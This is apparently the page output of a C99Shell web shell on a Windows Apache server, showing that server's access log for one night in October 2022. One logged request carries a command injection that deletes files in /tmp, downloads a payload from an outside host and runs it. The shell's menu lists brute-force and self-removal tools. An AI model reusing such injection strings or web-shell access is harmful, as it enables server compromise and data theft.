!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

E:\nuevo\apache\logs\   drwxrwxrwx
Free 8.02 GB of 239.26 GB (3.35%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     access.2022.10.25.log (3.29 MB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
216.245.221.92 - - [25/Oct/2022:00:00:12 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [25/Oct/2022:00:01:09 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43148
95.38.176.129 - - [25/Oct/2022:00:01:27 -0500] "GET / HTTP/1.1" 200 319
172.22.2.4 - - [24/Oct/2022:23:59:49 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [25/Oct/2022:00:00:39 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57375
193.142.146.35 - - [25/Oct/2022:00:02:42 -0500] "GET / HTTP/1.1" 200 319
193.142.146.35 - - [25/Oct/2022:00:02:42 -0500] "POST /HNAP1/ HTTP/1.1" 404 1018
190.27.8.60 - - [25/Oct/2022:00:04:01 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2014%2F HTTP/1.1" 200 883517
190.27.8.60 - - [25/Oct/2022:00:05:06 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2017%2F HTTP/1.1" 200 458368
216.245.221.92 - - [25/Oct/2022:00:05:12 -0500] "HEAD / HTTP/1.1" 200 -
207.46.13.10 - - [25/Oct/2022:00:05:20 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+2006%2FRES+2006+1-50%2F HTTP/1.1" 200 11867
201.245.192.253 - - [25/Oct/2022:00:06:07 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43148
172.22.2.4 - - [25/Oct/2022:00:05:39 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [25/Oct/2022:00:06:29 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59319
173.252.87.21 - - [25/Oct/2022:00:08:14 -0500] "GET /images/Junio%2002-experiencias-jardines-verticales-sda.jpeg HTTP/1.1" 200 31171
185.132.53.138 - - [25/Oct/2022:00:09:37 -0500] "GET / HTTP/1.1" 200 319
216.245.221.92 - - [25/Oct/2022:00:10:11 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [25/Oct/2022:00:11:06 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43148
172.22.2.4 - - [25/Oct/2022:00:12:15 -0500] "GET /BLA/boletinlegal/.git/config HTTP/1.1" 404 1018
172.22.2.4 - - [25/Oct/2022:00:11:29 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [25/Oct/2022:00:12:19 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56732
207.46.13.237 - - [25/Oct/2022:00:14:22 -0500] "-" 408 -
152.61.192.232 - - [25/Oct/2022:00:14:53 -0500] "GET / HTTP/1.1" 200 319
216.245.221.92 - - [25/Oct/2022:00:15:12 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [25/Oct/2022:00:16:05 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43148
172.22.2.4 - - [25/Oct/2022:00:16:20 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1018
172.22.2.4 - - [25/Oct/2022:00:16:05 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 20427
172.22.2.4 - - [25/Oct/2022:00:16:05 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 32715
172.22.2.4 - - [25/Oct/2022:00:17:19 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [25/Oct/2022:00:18:09 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 52493
216.245.221.92 - - [25/Oct/2022:00:20:11 -0500] "HEAD / HTTP/1.1" 200 -
152.61.128.50 - - [25/Oct/2022:00:20:29 -0500] "GET / HTTP/1.1" 200 319
93.158.161.55 - - [25/Oct/2022:00:21:01 -0500] "-" 408 -
93.158.161.5 - - [25/Oct/2022:00:21:07 -0500] "-" 408 -
201.245.192.253 - - [25/Oct/2022:00:21:05 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43148
77.88.5.49 - - [25/Oct/2022:00:21:12 -0500] "-" 408 -
93.158.161.54 - - [25/Oct/2022:00:21:18 -0500] "-" 408 -
93.158.161.29 - - [25/Oct/2022:00:21:33 -0500] "-" 408 -
77.88.5.232 - - [25/Oct/2022:00:21:48 -0500] "-" 408 -
201.245.192.253 - - [25/Oct/2022:00:22:08 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 44048
201.245.192.253 - - [25/Oct/2022:00:22:12 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42105
93.158.161.58 - - [25/Oct/2022:00:22:18 -0500] "-" 408 -
77.88.5.214 - - [25/Oct/2022:00:23:18 -0500] "-" 408 -
207.46.13.84 - - [25/Oct/2022:00:23:53 -0500] "GET /BLA/resoluciones/00000031.tif HTTP/1.1" 404 1018
77.88.5.162 - - [25/Oct/2022:00:24:18 -0500] "-" 408 -
172.22.2.4 - - [25/Oct/2022:00:24:21 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/CUADRO%20ANALISIS%20SENTENCIA%20T-411%20DE%201992.doc HTTP/1.1" 200 41984
172.22.2.4 - - [25/Oct/2022:00:23:09 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [25/Oct/2022:00:25:12 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [25/Oct/2022:00:23:59 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57375
201.245.192.253 - - [25/Oct/2022:00:26:04 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43148
77.88.5.10 - - [25/Oct/2022:00:26:18 -0500] "-" 408 -
40.77.167.102 - - [25/Oct/2022:00:26:55 -0500] "-" 408 -
207.46.13.84 - - [25/Oct/2022:00:28:13 -0500] "GET /BLA/boletinlegal/Directivas/2019/Directiva%20No.%200001%20del%2011%20de%20junio%20de%202019.pdf HTTP/1.1" 304 -
223.99.170.39 - - [25/Oct/2022:00:29:30 -0500] "GET /shell?cd+/tmp;rm+-rf+*;wget+ neverwinwlaq.xyz/jaws;sh+/tmp/jaws HTTP/1.1" 404 1013
216.245.221.92 - - [25/Oct/2022:00:30:11 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [25/Oct/2022:00:28:59 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [25/Oct/2022:00:31:03 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43148
157.55.39.202 - - [25/Oct/2022:00:31:20 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202013/1642.pdf HTTP/1.1" 304 -
172.22.2.4 - - [25/Oct/2022:00:29:49 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59319
186.28.188.228 - - [25/Oct/2022:00:31:34 -0500] "GET /animales-silvestres-regresaron-a-la-libertad-en-el-norte-de-bogota.html HTTP/1.1" 200 925
201.245.192.253 - - [25/Oct/2022:00:32:08 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 44048
201.245.192.253 - - [25/Oct/2022:00:32:11 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42105
191.156.238.15 - - [25/Oct/2022:00:32:57 -0500] "GET /appsia/controlador HTTP/1.1" 200 4799
191.156.238.15 - - [25/Oct/2022:00:32:57 -0500] "GET /appsia/css/estilos.css HTTP/1.1" 200 4804
191.156.238.15 - - [25/Oct/2022:00:32:57 -0500] "GET /appsia/scripts/validarIngreso.js HTTP/1.1" 304 -
191.156.238.15 - - [25/Oct/2022:00:32:57 -0500] "GET /appsia/images/cabezoteHojaVida.png HTTP/1.1" 200 32493
191.156.238.15 - - [25/Oct/2022:00:32:57 -0500] "GET /appsia/images/logo_bogota_p.png HTTP/1.1" 200 14951
191.156.238.15 - - [25/Oct/2022:00:32:57 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
65.154.226.220 - - [25/Oct/2022:00:32:59 -0500] "GET /portaldeninos/wp-includes/js/wp-emoji-release.min.js?ver=4.9.8 HTTP/1.1" 200 12026
65.154.226.220 - - [25/Oct/2022:00:32:59 -0500] "GET /portaldeninos/wp-content/plugins/google-analytics-for-wordpress/assets/js/frontend-gtag.min.js?ver=8.5.0 HTTP/1.1" 200 11801
65.154.226.220 - - [25/Oct/2022:00:33:00 -0500] "GET /portaldeninos/wp-includes/js/jquery/jquery.js?ver=1.12.4 HTTP/1.1" 200 97184
65.154.226.220 - - [25/Oct/2022:00:33:00 -0500] "GET /portaldeninos/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1 HTTP/1.1" 200 10056
65.154.226.220 - - [25/Oct/2022:00:33:01 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/core.min.js?ver=1.11.4 HTTP/1.1" 200 4000
65.154.226.220 - - [25/Oct/2022:00:33:01 -0500] "GET /portaldeninos/wp-content/plugins/gallery-videos/JS/modernizr.custom.js?ver=4.9.8 HTTP/1.1" 200 9019
65.154.226.220 - - [25/Oct/2022:00:33:01 -0500] "GET /portaldeninos/wp-content/plugins/gallery-videos/JS/Total-Soft-Gallery-Video-Widget.js?ver=4.9.8 HTTP/1.1" 200 80264
65.154.226.220 - - [25/Oct/2022:00:33:01 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/widget.min.js?ver=1.11.4 HTTP/1.1" 200 6908
65.154.226.220 - - [25/Oct/2022:00:33:02 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/mouse.min.js?ver=1.11.4 HTTP/1.1" 200 3148
65.154.226.220 - - [25/Oct/2022:00:33:02 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/sortable.min.js?ver=1.11.4 HTTP/1.1" 200 24899
65.154.226.220 - - [25/Oct/2022:00:33:02 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/tabs.min.js?ver=1.11.4 HTTP/1.1" 200 12110
65.154.226.220 - - [25/Oct/2022:00:33:03 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/accordion.min.js?ver=1.11.4 HTTP/1.1" 200 8584
65.154.226.220 - - [25/Oct/2022:00:33:03 -0500] "GET /portaldeninos/wp-content/themes/betheme/js/plugins.js?ver=20.9.6 HTTP/1.1" 200 197151
65.154.226.220 - - [25/Oct/2022:00:33:04 -0500] "GET /portaldeninos/wp-content/themes/betheme/js/menu.js?ver=20.9.6 HTTP/1.1" 200 2449
65.154.226.220 - - [25/Oct/2022:00:33:04 -0500] "GET /portaldeninos/wp-content/themes/betheme/assets/animations/animations.min.js?ver=20.9.6 HTTP/1.1" 200 1896
65.154.226.220 - - [25/Oct/2022:00:33:04 -0500] "GET /portaldeninos/wp-content/themes/betheme/assets/jplayer/jplayer.min.js?ver=20.9.6 HTTP/1.1" 200 52702
65.154.226.220 - - [25/Oct/2022:00:33:04 -0500] "GET /portaldeninos/wp-content/themes/betheme/js/scripts.js?ver=20.9.6 HTTP/1.1" 200 77162
65.154.226.220 - - [25/Oct/2022:00:33:05 -0500] "GET /portaldeninos/wp-includes/js/wp-embed.min.js?ver=4.9.8 HTTP/1.1" 200 1398
191.156.238.15 - - [25/Oct/2022:00:33:12 -0500] "POST /appsia/controlador HTTP/1.1" 200 5437
191.156.238.15 - - [25/Oct/2022:00:33:21 -0500] "POST /appsia/controlador HTTP/1.1" 200 7797
191.156.238.15 - - [25/Oct/2022:00:33:31 -0500] "POST /appsia/controlador HTTP/1.1" 200 6670
191.156.238.15 - - [25/Oct/2022:00:33:36 -0500] "POST /appsia/controlador HTTP/1.1" 200 11763
186.102.44.168 - - [25/Oct/2022:00:34:18 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX18Qoe8mGukpfIj5N7WEYzJY/gsTJlwJmqS2J4K4uBk0tTt3LCXRTqWgkE2FbN39ejyTPsp/+NnZiJoEVzlG0A1Lfa+An17nFeoaTh1PNyGVtTBGXMSgk2G6besC8ySJYHPqzSctwRRyLYg+6dxBbDLangnQqZU3w/98zdQ1AtsaOcZ21mX49gIcW0IkG4hW5Spzd7YjatOHdcotJf9Inz2kHmAoLCPzy7+CU3YCR2lBNMbEhR3I8+pvBeHRpU3sBHavgsulsPFdoQ==&u=U2FsdGVkX188R8qHOZ6e5h3vsjCbpMX/Xe8LXwCb9cU=&y=U2FsdGVkX18T4yYA188rZ9T40O+aXXudhBtocwCLxSmPCRL5P5tPQDYFfAbN90bD HTTP/1.1" 200 26
186.102.44.168 - - [25/Oct/2022:00:34:19 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1+51vwIrCB/Np8FFMcY+1YDhWz46wS4c97XVADEgScNIwuYhwocpG4+ntK5uj35YwkeFEhWNaWjcig9CO2vAxNDqJ987BD/5gy5Rop8UyrODun3xJ+sY7Rf078RUHJELgamyi2Rs8v4i+3uGc+qB8CXbpkEnPSZw+Bwacenh2P6TBscWoNQvhYZZ+79ycPQ696cMVj2notLSgJdk/vuYH+GNatTJ2Ye0AKx17P6BqmW4e3rNYsiduw7j/IuD5RdfCHI+uT9pfMeY6jekUZdYxpszghcQySpGjqbYJ/r3U7hQRMZ+GNS+pVkIA8QMRQYbylqKiuSaZaTF0WoFxV9kGKc9JmVIGjSsZ8cGnFbpvrYeIjv8OkL+UXjtpHoSGH89CmqcGlKXnM3aWUPvgsEBDUwIgonKNjHgqiqn01D3DhgYNZICB/TdgKlZYspbqCVU8Ii2OwQ9F7+sj+QWjr3Kbq8oEZ6nisb9bc0kIfu6nQbrzFmKQv49QuV95fPNMwI6E5QIBrEX4sgO0V3mpRlc866Jy2WbNFnL4L8T7XXxv9VxZ/U2jSI0wqdL3WfvEKb5+OZyJCyMX2q2oXc0dcm483yLJAUt3KBm7sLiT7JpedwcbBQ1uUK9wQGXNSRiV8eELFsnSZJdhRmZ9XeR2Oi3evbJa2laSfkvrVWquttAq+1THZ4+aTBq6yYWP0lG4+DjBJStQugqPDHo2Ti9HmLGiEyO1mnDVHig2cF+v73ZZgZGIXRCib80MhjZjSojo1RXX4REyPJaA/hHLfZtFWl8u4aeb0Y2Dbjc/fHsakQgb97x8EWTKcyoR2XCsAGoS2YtvlwPhCPhxiC4Voza3gii1ZuwnGUzNFEU0wxQIyLUI44fqqgvV7XNr4IkRmkGfhMDGwK9sy9C2ybBhi1VOrqqv8PbowoRfXUgMBT6jcYvqBDdpJ22AYAzXsTo78yoyXXAjaEy+ghwu5uDha2wNsfG0FwRkC5IGCDUvqP5JHqpPF8o8HLOaoBTmdo8/c9UbUjtJT4SYkKs6r0mfmc1YxMb21eYrBE9r3Qzf6rGiSzIIOa/Opfcnl3H8jETzEBKEL2zvhSRdlYlPr3Fpzm1YUp0JnkerHSCLREdGHzmt4s807w8fhCIY3Dk4W+Ormxj8msQ64TEQ49F557VMQ+CHoJ3JKrgvS0y/ilpeIrpZ2VvLEXf///gWapxRmV/Ul1TwQCYPvoagvagjskXi/LrxNLJGyVXoWYkwN8VxY1BG+tOMoJbBzO+Oa3WxvtlTAph7b7+3KxZK0vsG/HAnyCJlOr5yA1LqCeLkhW3D3ErHnwFwITrBy8UbZvhOwr/X//31X8APK5oUND1uJhl9wI9rSkP6q9q2kI/SI+YC9aQQM+qBvIxpCNslqxFBl95uK6L4VRgwaxs9Gmo67At4AkkuJUFKTizocGnE3bXD3U64IquqwiWVZds5dGiJYAzKWBONFWHbskNSPSdLPLXEU1Wu3KFEm1bb5UhkjzpChOYlXmj+Z26GLJiRt1n9701uEBV4ahQPRAyEmoijQFhkH21NjU5VadhZaXyOC8BD7HrVaXykAAayWHuH3K8YwVJCF1KzfKXbM+qE4/ZKLhAiox56CJMCyMeevACVa3m2OZdR2VfIPF9PSDmwAkXDb7ak5ZzflEXeDaXywmqbLCwJGnEiDdMxoyhmzAtFPHwQIkHBhXyEf4JYLxunuiAc+KtBaBv4gSSY19CEaWHaEzwA==&u=U2FsdGVkX188R8qHOZ6e5h3vsjCbpMX/Xe8LXwCb9cU=&y=U2FsdGVkX18T4yYA188rZ9T40O+aXXudhBtocwCLxSmPCRL5P5tPQDYFfAbN90bD HTTP/1.1" 200 26
186.102.44.168 - - [25/Oct/2022:00:34:19 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1+2G2+IHVBmmelvv9W3MHY8gLM5F63QthjCZ7Y7atfTTVjKR03pPZ0DXA4glPS5X5QZUwwiMDqa6JbbmRtEX9yXSdSkRo5C3D6sQgs6wq7dTGrFUZ5UqneEVkiNAwNlnv9GAmtucKxf69YdIz/wqhRH3k3eobEc4jE=&u=U2FsdGVkX188R8qHOZ6e5h3vsjCbpMX/Xe8LXwCb9cU=&y=U2FsdGVkX18T4yYA188rZ9T40O+aXXudhBtocwCLxSmPCRL5P5tPQDYFfAbN90bD HTTP/1.1" 200 26
186.102.44.168 - - [25/Oct/2022:00:34:19 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1+i55kBHoUd+Y/Dcay6z4A2oNb5rPZc7V9cQmg12KpZ+9rKTYBNYnLH5FsJvGGhr6pHtyWVMArC33aUsrTqLm2rngzu+pDAoBlYSJnlOKYCr95LBo7BH0LWhqJXJ4vjg7HlQO9RVFLlPuOODbuiKu4ns+FDFWh8MIU=&u=U2FsdGVkX188R8qHOZ6e5h3vsjCbpMX/Xe8LXwCb9cU=&y=U2FsdGVkX18T4yYA188rZ9T40O+aXXudhBtocwCLxSmPCRL5P5tPQDYFfAbN90bD HTTP/1.1" 200 25
186.102.44.168 - - [25/Oct/2022:00:34:19 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1+Xjk53AI7YXzE6VlhCCiuyOcL65BMQfA3jwp7IRVOKFwypyI6dyhxagacY+wJaVMNK3OeKM7EpWaTRjCcGLyJEIpY1fVsWx2VJRwq+LMYAvNS4Wslr/eqz3FR+omi1tdPWPYSI3rX1/sZPG582yStTSSYGNBedFDA=&u=U2FsdGVkX188R8qHOZ6e5h3vsjCbpMX/Xe8LXwCb9cU=&y=U2FsdGVkX18T4yYA188rZ9T40O+aXXudhBtocwCLxSmPCRL5P5tPQDYFfAbN90bD HTTP/1.1" 200 25
186.102.44.168 - - [25/Oct/2022:00:34:19 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1+mX8fxJ/lEt2k3PU2GrQ9laSAlnyRfRwc/DGIVjq2RsHr5IV1MtEd4ObyaYu46jGL6MM5w64BvLRIhYfyjZ/mlBIBSyIWkZXk5NHIHXhtvC6Oh6GVV9lHZhD0o71Tnn/b0cWCbHjlWYgRbaHFsgy0cNf2pnkU+zGqYSyWU4luiDQz+hiUtfz49&u=U2FsdGVkX188R8qHOZ6e5h3vsjCbpMX/Xe8LXwCb9cU=&y=U2FsdGVkX18T4yYA188rZ9T40O+aXXudhBtocwCLxSmPCRL5P5tPQDYFfAbN90bD HTTP/1.1" 200 25
181.51.48.104 - - [25/Oct/2022:00:35:10 -0500] "POST /appsia/controlador HTTP/1.1" 200 7797
216.245.221.92 - - [25/Oct/2022:00:35:11 -0500] "HEAD / HTTP/1.1" 200 -
181.51.48.104 - - [25/Oct/2022:00:35:22 -0500] "POST /appsia/controlador HTTP/1.1" 200 6670
181.51.48.104 - - [25/Oct/2022:00:35:24 -0500] "POST /appsia/controlador HTTP/1.1" 200 10595
181.51.48.104 - - [25/Oct/2022:00:35:35 -0500] "POST /appsia/controlador HTTP/1.1" 200 7797
181.51.48.104 - - [25/Oct/2022:00:35:43 -0500] "POST /appsia/controlador HTTP/1.1" 200 6670
181.51.48.104 - - [25/Oct/2022:00:35:47 -0500] "POST /appsia/controlador HTTP/1.1" 200 10206
201.245.192.253 - - [25/Oct/2022:00:36:01 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43148
172.22.2.4 - - [25/Oct/2022:00:34:49 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [25/Oct/2022:00:35:39 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56732
181.51.48.104 - - [25/Oct/2022:00:38:11 -0500] "POST /appsia/controlador HTTP/1.1" 200 7797
181.51.48.104 - - [25/Oct/2022:00:38:29 -0500] "POST /appsia/controlador HTTP/1.1" 200 6670
181.51.48.104 - - [25/Oct/2022:00:38:31 -0500] "POST /appsia/controlador HTTP/1.1" 200 11323
207.46.13.89 - - [25/Oct/2022:00:38:46 -0500] "GET /Publicaciones/2022EE239220.pdf HTTP/1.1" 404 228
191.102.197.181 - - [25/Oct/2022:00:38:59 -0500] "GET /kwssiamovil/sm/ldap/au?x=U2FsdGVkX1+/4XHu+9P19Ojl5U9ZVCwlmlJdPIsROrigfZTCG233mtv2WCIjKeny&y=U2FsdGVkX1+yjwH6BdbG/+5itswd544piSuP3+EyXiw= HTTP/1.1" 200 30
191.102.197.181 - - [25/Oct/2022:00:38:59 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX1//Z/u6ybPSgFTj+xhIDiLgC/5KIU32CAIgQe9caWtcily60z5a3RSDJUkXYZEgF1nHBrY4cDuL3OVDuCuCrRuNsHpp1GGjvV8=&u=U2FsdGVkX181To+TBUErvppdLhXDFLvJq66nPdo9oic=&y=U2FsdGVkX1+yjwH6BdbG/+5itswd544piSuP3+EyXiw= HTTP/1.1" 200 97
191.102.197.181 - - [25/Oct/2022:00:39:00 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX19iHjIF8QF1frlcnLefLQ+1tBIYkwzcW22NnXxbAAnZgfAx5ChQdSPuPFU4VOALXNUnvUpYicFNA1lYyHiYkdijjl46729VajKfnlbb6drVKRZ9xAD15xD+9IuRo9pWyuE1BdSbKT/nlMU+MQpDY+jHtWLpKsDqF4AXze/8fc0UCr8EEiZUKgI8nH8pk//NHU039Gt8fyBsBU1TuErprPhBz4NrPDyE6/Q9lnNhBkgm3ZuJ4Ir35pUrFwf62rnuQi7W+lN5mfayz+0VBjPb/2TSHGD7uKNIEWSjdTo8bOzs9H5/IJUttCNZAki+ORyo0laS4hpMRphdF8bsMysPLJ+OKpRRTmPKfL/WZi3JKcCweK4/flQEzJeegGiZcmhFkuC2sQEmocXFrty+CiJ6QCC6mf6XBKxWCOWeQXRbiLu7672D3h8Ldkha8xy+7cI8GLDXoh0arFTFEO8YqVRrpU8gMlrAoUZzDpg8ziGWNhqwOc15lYkKtx8XSySDC76rBVhB+6QLLV7INVPF4OSjOizbzyg0U6hCZ9Wd3zWanV8+2gwvRCul68pdPsxOlMWzgDG+jlN6UdeSFDNXKDbsVam59royT83zQgwJCg/G6Q49b1FINtF492xNY+um0FvtDLKtpUoB95fGzibLCuIEti3COzEy/sBddRt72UVngrQqqEVMG2mEBtVOOJp0uMRHw2qyGepqPUa0Qz1uNRCZFAZPpP2VIdEKwlUYb83RuWLSrommUa3rv5/fiEtH/GamTWejtMU5n0dY3LIO9YtRtdjMYvy0w3Ahh9CxtM2xn4H+pNpy6JwA4O5V68Io1wdsNJraoyu21E6DLZVbySr1HJp2a9YeYkvOB0fA3s+CiygQ8AN6eY8tlVWj5IVap6Wte8i3nYzG+JSPno9kpCW1armmzWwQL4dWRq8lng8qOG6xCkqeB9eTd9+i6JxBXJ7mS+JM1Rg/TAKwqpzw2sREKvfbpF+TnLpLUksgMTXpDjn2P7cTh/4eY8UvzWVBF+rdPbcV90bU+8to09V72P8inERz3Z0vQSCRdRUUebPkURTpzkvJy3ArRHXsJcM5o4nikHQNBMghzuSVaOvstujTPP7AAgwSyb+GYEWQlj+bbm6ncWozBgJuDg7Fi8Y3ayj0Q2Z9SWVt3ynO6jAMHRcepunYeSteMoneCfJgXWBX8orot+ULf0sOhx5cAqOLWQUDprldH6otJrEMapYpnoTfG6k8wp9z0F+idWKSBaFgReWQzwTL7U/PBMCfERM2ECjsXR6yaYvTeOQbROjBTIi5F8YGgV9eu0NtnhGYl8OnUWkxF1rwXazsvAoWlB76L5PWcaHQdObaJhzlPyI78EjIteuh6MsEGXyGB0uPVlIxb5YvT2So8VJxtwBzUlam6Pv4n78wTrPqr6bKT0UJsovtg71r0RVPI1GeZQE=&u=U2FsdGVkX181To+TBUErvppdLhXDFLvJq66nPdo9oic=&y=U2FsdGVkX1+yjwH6BdbG/+5itswd544piSuP3+EyXiw= HTTP/1.1" 200 2224
191.102.197.181 - - [25/Oct/2022:00:39:00 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX18E9CjTPpEfqbyB+6zx1MX3sUIr7Zqf5+j2wvCZQYceqc7efYnVBJNmIwGtqfwtp8XRhD2mFekWN+2caJ7qSCipfEvKZ93Tjyf7kSEsLVuCfat3pCtSjOUgEbPpNGO7R1URGAR98Owxr6W5/BJgzE9qzxdZRJ0ZLndGoRxhn8kdPwwqBhqiKBTZA3SvyTi7hBhA3kl/4lsM+23Pu/DpjzflHlCEq01Tdnj3Q0LgN2exSHAWZSZj3lMDQ+QrDpCx/pRLfkRsg5XHimchkmMxAgh7488/wPY3PSA73nO0G+eSCT4HZX5xYjBIzqydnP2efGuQiT4B5udtwA==&u=U2FsdGVkX181To+TBUErvppdLhXDFLvJq66nPdo9oic=&y=U2FsdGVkX1+yjwH6BdbG/+5itswd544piSuP3+EyXiw= HTTP/1.1" 200 196
191.102.197.181 - - [25/Oct/2022:00:39:00 -0500] "GET /kwssiamovil/sm/cjson/pre?f=1&x=U2FsdGVkX1+/4XHu+9P19Ojl5U9ZVCwlmlJdPIsROrigfZTCG233mtv2WCIjKeny HTTP/1.1" 200 30992
216.245.221.92 - - [25/Oct/2022:00:40:11 -0500] "HEAD / HTTP/1.1" 200 -
199.16.157.180 - - [25/Oct/2022:00:40:59 -0500] "GET /bogota-lanza-la-red-colaborativa-de-microsensores-para-medir-la-calidad-del-aire-en-microambientes.html HTTP/1.1" 200 1008
199.16.157.180 - - [25/Oct/2022:00:40:59 -0500] "GET /images/microsensores-1_optimized.jpeg HTTP/1.1" 200 158711
201.245.192.253 - - [25/Oct/2022:00:41:00 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43148
201.245.192.253 - - [25/Oct/2022:00:42:08 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 44048
201.245.192.253 - - [25/Oct/2022:00:42:11 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42105
152.61.128.50 - - [25/Oct/2022:00:42:15 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?request=GetCapabilities&service=WMS HTTP/1.1" 503 1020
152.61.128.50 - - [25/Oct/2022:00:42:16 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?SERVICE=WMS&REQUEST=GetCapabilities HTTP/1.1" 503 1020
152.61.128.50 - - [25/Oct/2022:00:42:16 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?WMTVER=1.0.0&REQUEST=capabilities HTTP/1.1" 503 1020
172.22.2.4 - - [25/Oct/2022:00:40:39 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [25/Oct/2022:00:41:29 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 54356
207.46.13.18 - - [25/Oct/2022:00:43:32 -0500] "GET /BLA/resoluciones/Notificaciones/AUTOS%202017/02456.pdf HTTP/1.1" 304 -
181.143.146.234 - - [25/Oct/2022:00:43:47 -0500] "GET /catalogoisis/ HTTP/1.1" 200 8575
181.143.146.234 - - [25/Oct/2022:00:43:48 -0500] "GET /catalogoisis/Js/AceptarLimpiar.js HTTP/1.1" 200 331
181.143.146.234 - - [25/Oct/2022:00:43:48 -0500] "GET /catalogoisis/Css/Busqueda.css HTTP/1.1" 200 1995
181.143.146.234 - - [25/Oct/2022:00:43:48 -0500] "GET /catalogoisis/Js/Remote.js HTTP/1.1" 200 436
181.143.146.234 - - [25/Oct/2022:00:43:48 -0500] "GET /catalogoisis/Js/Go.js HTTP/1.1" 200 364
181.143.146.234 - - [25/Oct/2022:00:43:48 -0500] "GET /catalogoisis/Js/Cookies.js HTTP/1.1" 200 1369
181.143.146.234 - - [25/Oct/2022:00:43:48 -0500] "GET /catalogoisis/Js/CriterioCombinada.js HTTP/1.1" 200 1843
181.143.146.234 - - [25/Oct/2022:00:43:48 -0500] "GET /catalogoisis/Js/LimpiarCombinada.js HTTP/1.1" 200 207
181.143.146.234 - - [25/Oct/2022:00:43:48 -0500] "GET /catalogoisis/Js/Numero.js HTTP/1.1" 200 398
181.143.146.234 - - [25/Oct/2022:00:43:48 -0500] "GET /catalogoisis/Js/Enter.js HTTP/1.1" 200 1208
181.143.146.234 - - [25/Oct/2022:00:43:48 -0500] "GET /catalogoisis/imagenes/br1c1.gif HTTP/1.1" 200 172
181.143.146.234 - - [25/Oct/2022:00:43:48 -0500] "GET /catalogoisis/imagenes/br1c3.gif HTTP/1.1" 200 302
